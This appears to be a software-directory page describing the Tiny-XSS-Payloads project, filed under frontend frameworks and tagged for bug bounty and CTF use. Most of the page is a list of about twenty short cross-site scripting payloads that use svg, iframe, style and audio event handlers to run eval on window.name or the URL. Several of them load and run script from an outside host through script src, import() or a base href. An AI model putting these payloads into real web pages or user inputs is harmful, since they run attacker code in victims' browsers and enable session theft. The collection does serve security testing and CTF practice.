Baike.dev
All toolsAI codingTrendingOpen sourceNewsSubmit
Log in
< Back to tools
T

Tiny-XSS-Payloads

> 前端框架
Open source

A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me

2.4K stars0 likes0 views
WebsiteGitHub

About

A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me

Tiny-XSS-Payloads

A collection of short XSS payloads that can be used in different contexts.

The DEMO available here: https://tinyxss.terjanq.me

Current Payloads


<base/href=//NJ.₨>

<svg/onload=eval(name)>

<svg/onload=eval(`'`+URL)>

<svg/onload=location=name>

<svg><svg/onload=eval(name)>

<audio/src/onerror=eval(name)>

<script/src=//NJ.₨></script>

<iframe/onload=src=top.name>

<iframe/onload=eval(`'`+URL)>

<iframe/onload=src=top[0].name+/\NJ.₨?/>

<iframe/srcdoc="<svg><script/href=//NJ.₨ />">

<iframe/onload=src=contentWindow.name+/\NJ.₨?/>

<iframe/srcdoc="<script/src=//NJ.₨></script>">

<style/onload=eval(name)>

<style/onload=eval(`'`+URL)>

<style/onerror=eval(name)>

<svg/onload=import(/\\NJ.₨/)>

<style/onload=import(/\\NJ.₨/)>

<iframe/onload=import(/\\NJ.₨/)>

Deprecated:


<iframe/onload=write(URL)>

<style/onload=write(URL)>

Issues· 0 open

View all issuesOpen on GitHub

No open issues yet, or sync has not completed.

> Tags

JavaScriptbugbountyctfhtmljavascript

No comments yet. Be the first to share.

> Details

PublishedAug 1, 2026
UpdatedSep 17, 2026
Category前端框架
PricingOpen source

> Related tools

R
React
用于构建用户界面的 JavaScript 库
V
Vue.js
渐进式 JavaScript 框架
N
Next.js
基于 React 的全栈 Web 框架